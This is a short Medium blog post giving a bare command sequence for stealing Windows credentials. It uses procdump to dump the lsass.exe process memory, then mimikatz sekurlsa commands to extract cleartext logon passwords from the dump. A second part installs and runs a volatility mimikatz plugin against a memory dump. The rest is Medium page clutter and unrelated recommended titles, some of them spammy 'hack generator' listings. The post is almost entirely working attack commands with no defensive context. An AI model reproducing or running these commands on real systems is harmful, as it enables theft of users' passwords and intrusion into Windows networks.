using Mimikatz to get cleartext password from offline memory dump

C:\temp\procdump.exe -accepteula  -ma lsass.exe lsass.dmp
#For 32 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp
#For 64 bits
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords full
  1. /usr/share/volatility
  2. mkdir plugins
  3. cd plugins
  4. wget https://raw.githubusercontent.com/dfirfpi/hotoloti/master/volatility/mimikatz.py
  5. apt-get install python-crypto
  6. volatility — plugins=/usr/share/volatility/plugins — profile=Win7SP0x86 -f halomar.dmp mimikatz

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

{UPDATE} Unicorn Cake Hack Free Resources Generator

0 Password, make password managers great again — never losing your password manager password

Communication on Internet

Secret NFTs support both public and private metadata.

{UPDATE} RAVON Hack Free Resources Generator

Everything You Need To Know — U.S. Users

Just how private is your inbox?

A Cookie Story

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
AliBawazeEer

AliBawazeEer

More from Medium

How To Trade Nifty Index Straddles After Budget?

Preparing for your mortgage application

Gunbot guide to emotionless trading

AMD introduces FSR 2.0 giving gaming GPUs a boost | Vic B’Stard’s State of Play